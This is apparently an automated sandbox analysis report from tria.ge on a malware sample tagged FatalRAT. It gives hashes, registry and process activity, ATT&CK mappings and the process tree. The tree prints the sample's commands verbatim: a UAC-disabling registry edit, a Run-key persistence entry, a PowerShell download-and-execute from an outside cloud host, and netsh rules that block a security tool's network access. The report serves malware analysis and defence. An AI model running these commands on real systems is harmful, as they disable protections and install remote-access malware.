Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
141s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20250217-en -
resource tags
arch:x64arch:x86image:win10v2004-20250217-enlocale:en-usos:windows10-2004-x64system -
submitted
23/02/2025, 12:41
Static task
static1
Behavioral task
behavioral1
Sample
2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe
Resource
win10v2004-20250217-en
General
-
Target
2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe
-
Size
20.0MB
-
MD5
f999f60afb55137a3c068a707a421a5f
-
SHA1
15f5a8d7930cef9479caf9ecc2dd2c2d8f1efb32
-
SHA256
b17337db64b6ab60e969cec89c36058baf5e100c25684bda9beb0afa1c342b4d
-
SHA512
24a7ffcec017937eec514a2bf2d1d36632abb829ece9fe59c63decb4c07e52f3a0ae8d09c8e7f61fa0f7fa1ecef5fdae8702ab48a09266391969fb71b85fbe4c
-
SSDEEP
196608:patpgF2oM7Vk96Cy8xEqn0SweKG8UvMGnsOTMk:otpgF2oM7Vk96Cy8xEqn0MlDvtnsO4
Malware Config
Extracted
https://baba-1336130708.cos.ap-tokyo.myqcloud.com/tsetup-x64.5.11.1.exe
Signatures
-
Fatalrat family
-
UAC bypass 3 TTPs 1 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" reg.exe -
Fatal Rat payload 1 IoCs
resource yara_rule behavioral2/memory/5056-63-0x0000000002BF0000-0x0000000002C19000-memory.dmp fatalrat -
Blocklisted process makes network request 2 IoCs
flow pid Process 37 1580 powershell.exe 37 1580 powershell.exe -
Downloads MZ/PE file 1 IoCs
flow pid Process 37 1580 powershell.exe -
Modifies Windows Firewall 2 TTPs 8 IoCs
pid Process 3968 netsh.exe 2380 netsh.exe 4544 netsh.exe 4556 netsh.exe 4832 netsh.exe 3936 netsh.exe 3316 netsh.exe 2792 netsh.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Control Panel\International\Geo\Nation 2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe -
Executes dropped EXE 4 IoCs
pid Process 5056 Agghosts.exe 4084 bin.exe 1712 bin.tmp 1920 Telegram.exe -
Loads dropped DLL 2 IoCs
pid Process 5056 Agghosts.exe 1920 Telegram.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\GoogleUpdata_Service = "C:\\programdata\\lnk\\dick.lnk" reg.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
pid Process 1580 powershell.exe -
Drops desktop.ini file(s) 1 IoCs
description ioc Process File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\desktop.ini Telegram.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 24 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe -
System Location Discovery: System Language Discovery 1 TTPs 3 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Agghosts.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language bin.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language bin.tmp -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Agghosts.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz Agghosts.exe -
Enumerates system info in registry 2 TTPs 6 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\BaseBoardProduct Telegram.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Telegram.exe Key queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Telegram.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\ Telegram.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Telegram.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily Telegram.exe -
Modifies registry class 33 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000_Classes\tdesktop.tg\DefaultIcon\ = "\"C:\\Users\\Admin\\AppData\\Roaming\\Telegram Desktop\\Telegram.exe,1\"" Telegram.exe Key created \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000_Classes\tdesktop.tonsite\DefaultIcon Telegram.exe Key created \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000_Classes\tdesktop.tonsite\shell\open\command Telegram.exe Set value (str) \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000_Classes\tdesktop.tg\shell\open\command\ = "\"C:\\Users\\Admin\\AppData\\Roaming\\Telegram Desktop\\Telegram.exe\" -- \"%1\"" Telegram.exe Key created \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000_Classes\tdesktop.tonsite\shell Telegram.exe Set value (str) \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000_Classes\tonsite\ = "URL:TonSite Link" Telegram.exe Key created \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000_Classes\tonsite\DefaultIcon Telegram.exe Set value (str) \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000_Classes\tonsite\shell\open\command\ = "\"C:\\Users\\Admin\\AppData\\Roaming\\Telegram Desktop\\Telegram.exe\" -- \"%1\"" Telegram.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ 2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe Key created \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000_Classes\tg\shell\open\command Telegram.exe Set value (str) \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000_Classes\tg\shell\open\command\ = "\"C:\\Users\\Admin\\AppData\\Roaming\\Telegram Desktop\\Telegram.exe\" -- \"%1\"" Telegram.exe Key created \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000_Classes\tdesktop.tg\DefaultIcon Telegram.exe Key created \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000_Classes\tdesktop.tg\shell\open\command Telegram.exe Key created \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000_Classes\tg\DefaultIcon Telegram.exe Set value (str) \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000_Classes\tg\DefaultIcon\ = "\"C:\\Users\\Admin\\AppData\\Roaming\\Telegram Desktop\\Telegram.exe,1\"" Telegram.exe Key created \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000_Classes\tg\shell Telegram.exe Key created \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000_Classes\tonsite\shell Telegram.exe Key created \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000_Classes\tonsite\shell\open\command Telegram.exe Key created \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000_Classes\tg Telegram.exe Key created \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000_Classes\tdesktop.tonsite\shell\open Telegram.exe Set value (str) \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000_Classes\tonsite\URL Protocol Telegram.exe Key created \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000_Classes\tonsite\shell\open Telegram.exe Key created \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000_Classes\tdesktop.tg\shell\open Telegram.exe Set value (str) \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000_Classes\tg\URL Protocol Telegram.exe Key created \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000_Classes\tg\shell\open Telegram.exe Key created \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000_Classes\tdesktop.tonsite Telegram.exe Set value (str) \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000_Classes\tdesktop.tonsite\DefaultIcon\ = "\"C:\\Users\\Admin\\AppData\\Roaming\\Telegram Desktop\\Telegram.exe,1\"" Telegram.exe Set value (str) \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000_Classes\tdesktop.tonsite\shell\open\command\ = "\"C:\\Users\\Admin\\AppData\\Roaming\\Telegram Desktop\\Telegram.exe\" -- \"%1\"" Telegram.exe Set value (str) \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000_Classes\tonsite\DefaultIcon\ = "\"C:\\Users\\Admin\\AppData\\Roaming\\Telegram Desktop\\Telegram.exe,1\"" Telegram.exe Key created \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000_Classes\tdesktop.tg Telegram.exe Key created \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000_Classes\tdesktop.tg\shell Telegram.exe Set value (str) \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000_Classes\tg\ = "URL:Telegram Link" Telegram.exe Key created \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000_Classes\tonsite Telegram.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 1920 Telegram.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 396 2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe 396 2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe 396 2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe 396 2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe 396 2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe 396 2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe 396 2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe 396 2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe 396 2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe 396 2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe 396 2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe 396 2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe 396 2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe 396 2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe 1580 powershell.exe 1580 powershell.exe 5056 Agghosts.exe 5056 Agghosts.exe 5056 Agghosts.exe 5056 Agghosts.exe 5056 Agghosts.exe 5056 Agghosts.exe 5056 Agghosts.exe 5056 Agghosts.exe 5056 Agghosts.exe 5056 Agghosts.exe 5056 Agghosts.exe 5056 Agghosts.exe 5056 Agghosts.exe 5056 Agghosts.exe 5056 Agghosts.exe 5056 Agghosts.exe 5056 Agghosts.exe 5056 Agghosts.exe 5056 Agghosts.exe 5056 Agghosts.exe 5056 Agghosts.exe 5056 Agghosts.exe 5056 Agghosts.exe 5056 Agghosts.exe 5056 Agghosts.exe 5056 Agghosts.exe 5056 Agghosts.exe 5056 Agghosts.exe 5056 Agghosts.exe 5056 Agghosts.exe 5056 Agghosts.exe 5056 Agghosts.exe 5056 Agghosts.exe 5056 Agghosts.exe 5056 Agghosts.exe 5056 Agghosts.exe 5056 Agghosts.exe 5056 Agghosts.exe 5056 Agghosts.exe 5056 Agghosts.exe 5056 Agghosts.exe 5056 Agghosts.exe 5056 Agghosts.exe 5056 Agghosts.exe 5056 Agghosts.exe 5056 Agghosts.exe 5056 Agghosts.exe 5056 Agghosts.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 5056 Agghosts.exe Token: SeDebugPrivilege 1580 powershell.exe -
Suspicious use of FindShellTrayWindow 5 IoCs
pid Process 1712 bin.tmp 1920 Telegram.exe 1920 Telegram.exe 1920 Telegram.exe 1920 Telegram.exe -
Suspicious use of SendNotifyMessage 4 IoCs
pid Process 1920 Telegram.exe 1920 Telegram.exe 1920 Telegram.exe 1920 Telegram.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
pid Process 1920 Telegram.exe 1920 Telegram.exe -
Suspicious use of WriteProcessMemory 41 IoCs
description pid Process procid_target PID 396 wrote to memory of 4412 396 2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe 89 PID 396 wrote to memory of 4412 396 2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe 89 PID 396 wrote to memory of 5056 396 2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe 91 PID 396 wrote to memory of 5056 396 2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe 91 PID 396 wrote to memory of 5056 396 2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe 91 PID 4412 wrote to memory of 2056 4412 cmd.exe 92 PID 4412 wrote to memory of 2056 4412 cmd.exe 92 PID 396 wrote to memory of 5048 396 2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe 93 PID 396 wrote to memory of 5048 396 2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe 93 PID 396 wrote to memory of 1500 396 2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe 95 PID 396 wrote to memory of 1500 396 2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe 95 PID 396 wrote to memory of 2524 396 2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe 97 PID 396 wrote to memory of 2524 396 2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe 97 PID 1500 wrote to memory of 2928 1500 cmd.exe 99 PID 1500 wrote to memory of 2928 1500 cmd.exe 99 PID 2524 wrote to memory of 4544 2524 cmd.exe 100 PID 2524 wrote to memory of 4544 2524 cmd.exe 100 PID 1500 wrote to memory of 1580 1500 cmd.exe 101 PID 1500 wrote to memory of 1580 1500 cmd.exe 101 PID 2524 wrote to memory of 4556 2524 cmd.exe 102 PID 2524 wrote to memory of 4556 2524 cmd.exe 102 PID 2524 wrote to memory of 4832 2524 cmd.exe 103 PID 2524 wrote to memory of 4832 2524 cmd.exe 103 PID 2524 wrote to memory of 3936 2524 cmd.exe 104 PID 2524 wrote to memory of 3936 2524 cmd.exe 104 PID 2524 wrote to memory of 3316 2524 cmd.exe 105 PID 2524 wrote to memory of 3316 2524 cmd.exe 105 PID 2524 wrote to memory of 2792 2524 cmd.exe 106 PID 2524 wrote to memory of 2792 2524 cmd.exe 106 PID 2524 wrote to memory of 3968 2524 cmd.exe 107 PID 2524 wrote to memory of 3968 2524 cmd.exe 107 PID 2524 wrote to memory of 2380 2524 cmd.exe 108 PID 2524 wrote to memory of 2380 2524 cmd.exe 108 PID 1500 wrote to memory of 4084 1500 cmd.exe 109 PID 1500 wrote to memory of 4084 1500 cmd.exe 109 PID 1500 wrote to memory of 4084 1500 cmd.exe 109 PID 4084 wrote to memory of 1712 4084 bin.exe 110 PID 4084 wrote to memory of 1712 4084 bin.exe 110 PID 4084 wrote to memory of 1712 4084 bin.exe 110 PID 1712 wrote to memory of 1920 1712 bin.tmp 116 PID 1712 wrote to memory of 1920 1712 bin.tmp 116
Processes
-
C:\Users\Admin\AppData\Local\Temp\2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe"C:\Users\Admin\AppData\Local\Temp\2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe"1⤵
- Checks computer location settings
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:396 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Public\Downloads\20250223024202\1.bat" "2⤵
- Suspicious use of WriteProcessMemory
PID:4412 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f3⤵
- UAC bypass
PID:2056
-
-
-
C:\programdata\20250223024202\Agghosts.exe"C:\programdata\20250223024202\Agghosts.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5056
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v GoogleUpdata_Service /d "C:\programdata\lnk\dick.lnk" /f2⤵
- Adds Run key to start application
PID:5048
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Public\Videos\download_and_run.bat" "2⤵
- Suspicious use of WriteProcessMemory
PID:1500 -
C:\Windows\system32\chcp.comchcp 650013⤵PID:2928
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://baba-1336130708.cos.ap-tokyo.myqcloud.com/tsetup-x64.5.11.1.exe', 'C:\Users\Public\Videos\bin.exe')"3⤵
- Blocklisted process makes network request
- Downloads MZ/PE file
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1580
-
-
C:\Users\Public\Videos\bin.exe"C:\Users\Public\Videos\bin.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4084 -
C:\Users\Admin\AppData\Local\Temp\is-DUQG5.tmp\bin.tmp"C:\Users\Admin\AppData\Local\Temp\is-DUQG5.tmp\bin.tmp" /SL5="$1301F8,46193823,827904,C:\Users\Public\Videos\bin.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:1712 -
C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe"C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe"5⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops desktop.ini file(s)
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:1920
-
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Public\Downloads\20250223024202\fhq.bat" "2⤵
- Suspicious use of WriteProcessMemory
PID:2524 -
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="Block Program Network Access" dir=in action=block program="" enable=yes3⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:4544
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="Block Program Network Access" dir=out action=block program="" enable=yes3⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:4556
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="Block Program Network Access2" dir=in action=block program="safemon\360tray.exe=360Safe.exe" enable=yes3⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:4832
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="Block Program Network Access2" dir=out action=block program="safemon\360tray.exe=360Safe.exe" enable=yes3⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:3936
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set allprofiles state on3⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:3316
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set privateprofile settings inboundusernotification disable3⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:2792
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set publicprofile settings inboundusernotification disable3⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:3968
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set domainprofile settings inboundusernotification disable3⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:2380
-
-
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Event Triggered Execution
1Netsh Helper DLL
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Event Triggered Execution
1Netsh Helper DLL
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Impair Defenses
2Disable or Modify System Firewall
1Disable or Modify Tools
1Modify Registry
2Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2.7MB
MD52a24dcd41bc3c5b5f7eceda525786578
SHA17e898f9ee5a97a1a261326f0168e8de44dcf8af4
SHA256169e9e4b23878035551455f4e5dbd01ece204e59fe75361680e8786998059ca7
SHA512aaded4c72d3fa77eefd9d4b098288dd6923bd79813466d93313d6acb00fea9bb90248fff92cc89a625c60ae3b7cc1c27e8bb178fdac624ec896267da57b9fd6a
-
Filesize
1KB
MD597dd1e75e3378d3e5f4cb676787df4c5
SHA19050ff87b70c2d534c1218113a3f5e3d971b4d90
SHA256fc567936880543449bfc3c148219e3332db05554a2bfee030cade8f0ecc6b4ee
SHA512acf35d67939ff0281e66b1b281197a815eb932b79c18d121ec68a366509fd3aade0bde257ba0d22e9396b172d2a6915cc000a2e961fa701e9586b09d46e17655
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
3.2MB
MD52e90747fe82d7271fbe97ea022fd5173
SHA16164bc0ec0c908e9159a0c5d558945d7974e11c1
SHA256bbec6b26c13b8ebfd01789a8248c6a45646134daf1ef998dbb885ec59157e6b4
SHA512d9a797861f8a7fc966a0a00e1719734a23c95c39aca9d70322d09274119267c8bd0d86a3ec468a7f493422769f89a48469f1e33a6a1dd2d39cb30cfb4df6fa44
-
Filesize
4.7MB
MD5a7349236212b0e5cec2978f2cfa49a1a
SHA15abb08949162fd1985b89ffad40aaf5fc769017e
SHA256a05d04a270f68c8c6d6ea2d23bebf8cd1d5453b26b5442fa54965f90f1c62082
SHA512c7ff4f9146fefedc199360aa04236294349c881b3865ebc58c5646ad6b3f83fca309de1173f5ebf823a14ba65e5ada77b46f20286d1ea62c37e17adbc9a82d02
-
Filesize
229B
MD5fa42ebb1071abc0e618c296ea2cf71a6
SHA19e0c0737b0e37b3e821d011eecd9b0c7c9f2a15a
SHA256395f835731d25803a791db984062dd5cfdcade6f95cc5d0f68d359af32f6258d
SHA5120ed9919675c224201996caeeecf625a1db00a70af5d3ba135dc3d6fa16bfcc562426c813e21b4e861f04d312635be3528d79b5c49b23e78161f2b051fa9aaf05
-
Filesize
1KB
MD53a7cb580bd340505f6dc5b4c829a3eca
SHA121cc730517d74fa1d13316d7e0d817f3bd710906
SHA2561c1528b546aa29be6614707cbe408cb4b46e8ed05bf3fe6b388b9f22a4ee37e2
SHA512c224fa676542b90f8fc990e574028af664dced61612855290fb23ce4acad2d6b9043e901365939106b591b6746b3e4ddada15eede88a947051e9d8083194e630
-
Filesize
45.0MB
MD506eaa3263801f4d695c3727834ffbca5
SHA158031db0039cf00a1fe738e55ee2fca35558c4fd
SHA25697969d6e01ee37a16f4f7f64e6166f169bedfe95190f48d426693d4b95e8e8ff
SHA5127b03899c6ce403172eb6d159e142b8ac25ef3aa6eb7f56abd205657d13832eb5b8ee61408b8d7a6f3f1c57de7fcc2565ce2ce9ecb4e54611f4c48098a870b6b3
-
Filesize
415B
MD5a90ccfd040d774b547f7d258b8e03661
SHA1c46e353d34723f9393482974a516d51dfb52440d
SHA256d852cfc4107e9ce5bec7349ef180366bbb4fe0878e725325a2b844f93a1ac1e2
SHA512bdc816781c44b6e9bbc8207a3c0466a45397cf7815f267add21abe243bf138b5bae7ffec867433bf249e139b726413f68b7002f541c89ae1a25bd1e6980abfd7
-
Filesize
192KB
MD52fd94f6e1d71454d716a126f0d7450ac
SHA15d966df95c741880089e9078af921a22216516ec
SHA256a599cbb05b69328655a7a0afc2644ed607c30a05edfb8fd6be2ea920c25b54b5
SHA512340107b69fc49b8fe1acf37a3a6e40c4b7206cf3ae069fea6f4ba702a733401e1feef55e1d858b3529764bcd0ba371ef552f5838444b65b62545e1da150f9bb2
-
Filesize
1.9MB
MD5b7f8c3416cdfd6f46c790da064f66099
SHA1d7ae9a3d49bbf1981e7d6604128e18b6cd160bd6
SHA256b9edf03447cf402e24da384c146c9d1536871a47518c795c4aea6550e3abd94d
SHA51224272954e57f4f4f81dad90469e84946549e3441ba599f8b819d069b803687b3da35f449c0f18755352dba208d6d63af1d6b53c0a56adbd36540b1537bb99dc7